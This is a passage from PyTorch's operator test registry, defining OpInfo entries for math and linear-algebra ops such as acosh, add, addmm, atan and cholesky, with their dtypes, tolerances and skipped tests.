ref=np.arccosh, domain=(1, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), # "rsqrt_cuda" not implemented for 'BFloat16' backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Reference: https://github.com/pytorch/pytorch/issues/50692 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), ), # acosh is not defined at x < 1 (real) or |z| < 1 (complex) reference_numerics_filter=NumericsFilter( condition=lambda x: (torch.abs(x) < 1 if x.is_complex() else x < 1), safe_val=2)), BinaryUfuncInfo('add', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, sample_inputs_func=sample_inputs_add_sub, supports_fwgrad_bwgrad=True, supports_forward_ad=True, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), ), skips=( # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex64, torch.complex128)), )), BinaryUfuncInfo('mul', aliases=('multiply',), 
dtypes=all_types_and_complex_and(torch.chalf, torch.float16, torch.bfloat16, torch.bool), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True), BinaryUfuncInfo('sub', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.subtract(input, np.multiply(alpha, other)), aliases=('subtract',), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_add_sub, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestCommon', 'test_complex_half_reference_testing', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_comprehensive', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_quick', device_type='cpu'), ), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.uint8,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), OpInfo('addmm', # This addmm OpInfo is for when alpha and beta are not both equal to 1. # alpha=beta=1 is tested in the following opinfo, because that special case will # trigger addmm being decomposed by a jit pass. dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if CUDA11OrLater else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_addmm), OpInfo('addmm', # When alpha=beta=1 as compile-time constants, JIT will decompose addmm into mm and add. 
variant_test_name='decomposed', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if(CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, autodiff_nonfusible_nodes=['aten::add', 'aten::mm'], sample_inputs_func=partial(sample_inputs_addmm, alpha=1, beta=1), skips=( # https://github.com/pytorch/pytorch/issues/71784 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.float16,)), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), )), OpInfo('addmv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_addmv), OpInfo('addbmm', ref=lambda M, batch1, batch2, beta=1, alpha=1: np.add(np.multiply(np.asarray(beta, dtype=M.dtype), M), np.multiply(np.asarray(alpha, dtype=batch1.dtype), np.sum(np.matmul(batch1, batch2), axis=0))), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1.3e-05, rtol=1.3e-05), torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_numpy_refs')], skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # addbmm does not correctly warn when resizing out= inputs DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # https://github.com/pytorch/pytorch/issues/55907 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addbmm), OpInfo('baddbmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if CUDA11OrLater or TEST_WITH_ROCM else []), backward_dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if SM53OrLater or TEST_WITH_ROCM else [], torch.complex64, torch.complex128), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view', device_type='cuda')], sample_inputs_func=sample_inputs_baddbmm), OpInfo('dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('vdot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, 
supports_fwgrad_bwgrad=True, ), OpInfo('bmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), ), sample_inputs_func=sample_inputs_bmm), OpInfo('mv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mv), OpInfo('addr', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), backward_dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # Reference: https://github.com/pytorch/pytorch/issues/50747 supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/50747 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16)), ), sample_inputs_func=sample_inputs_addr, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('addcmul', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8, torch.int16, torch.int32, torch.int64)), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), OpInfo('addcdiv', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), UnaryUfuncInfo('asin', aliases=('arcsin', ), ref=np.arcsin, domain=(-1, 1), supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-05, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda'), precisionOverride({torch.bfloat16: 1e-2}), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', 
dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), # NOTE: derivative for inplace asinh is not implemented UnaryUfuncInfo('asinh', aliases=('arcsinh', ), ref=np.arcsinh, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('atan', aliases=('arctan', ), ref=np.arctan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM, device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), BinaryUfuncInfo('atan2', aliases=('arctan2',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), UnaryUfuncInfo('atanh', aliases=('arctanh', ), ref=np.arctanh, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), 
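# Note (assumption, not verified against the CI failures): the complex-dtype
# reference skips for atanh likely stem from accuracy differences vs. NumPy
# near the branch points at +/-1.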
DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), )), OpInfo('allclose', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=np.allclose, supports_autograd=False, supports_forward_ad=False, sample_inputs_func=sample_inputs_allclose, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_out=False), OpInfo('broadcast_to', ref=np.broadcast_to, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_broadcast_to), OpInfo('broadcast_shapes', op=torch.broadcast_shapes, ref=np.broadcast_shapes if np.lib.NumpyVersion(np.__version__) >= '1.20.0' else None, dtypes=_dispatch_dtypes((torch.float32,)), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, supports_autograd=False, supports_scripting=False, sample_inputs_func=sample_inputs_broadcast_shapes, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # skip dtype tests since broadcast_shape is not device dependent. # having dtypes limited to torch.float32 would cause test_dtypes to report unexpected success DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_dtypes'), # skip these tests since we have non tensor input DecorateInfo(unittest.skip('Skipped!'), "TestCommon", "test_noncontiguous_samples"), DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('broadcast_tensors', ref=np.broadcast_arrays, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_broadcast_tensors, reference_inputs_func=reference_inputs_broadcast_tensors, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), )), OpInfo('block_diag', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Default batching rule in core doesn't work for ops with TensorList args check_batched_forward_grad=False, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_block_diag), UnaryUfuncInfo('bitwise_not', ref=np.bitwise_not, dtypes=integral_types_and(torch.bool), operator_variant=operator.invert, supports_autograd=False), BinaryUfuncInfo('bitwise_left_shift', op=torch.bitwise_left_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.lshift, inplace_operator_variant=operator.ilshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('bitwise_right_shift', op=torch.bitwise_right_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.rshift, inplace_operator_variant=operator.irshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), OpInfo('combinations', op=torch.combinations, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_combinations), OpInfo('cartesian_prod', op=torch.cartesian_prod, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cartesian_prod, skips=( DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), )), OpInfo('cdist', dtypes=floating_types(), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, sample_inputs_func=sample_inputs_cdist), UnaryUfuncInfo('ceil', ref=np.ceil, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('cholesky', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],), 
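# cholesky_inverse takes a Cholesky factor L of a Hermitian positive-definite
# A = L @ L.mH and returns inv(A); hence the triangular-input gradcheck wrapper
# requiring a real positive diagonal below.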
OpInfo('cholesky_inverse', dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_gradgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky_inverse, gradcheck_wrapper=gradcheck_wrapper_triangular_input_real_positive_diagonal, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Strides are not the same! Original strides were ((4, 2, 1),) and strides are now ((4, 1, 2),) DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),)), OpInfo('cholesky_solve', op=torch.cholesky_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_cholesky_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('chunk', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_chunk, reference_inputs_func=reference_inputs_chunk, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('clone', ref=np.copy, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_clone, reference_inputs_func=reference_inputs_clone, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('contiguous', op=lambda x, *args, **kwargs: x.contiguous(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_contiguous, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_fusible_nodes=['aten::contiguous'], assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('sum_to_size', op=lambda x, *args, **kwargs: x.sum_to_size(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sum_to_size, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float,)),),), OpInfo('symeig', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_symeig, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off]), # NOTE: clamp has separate opinfos for scalar min/max (unary op) vs. 
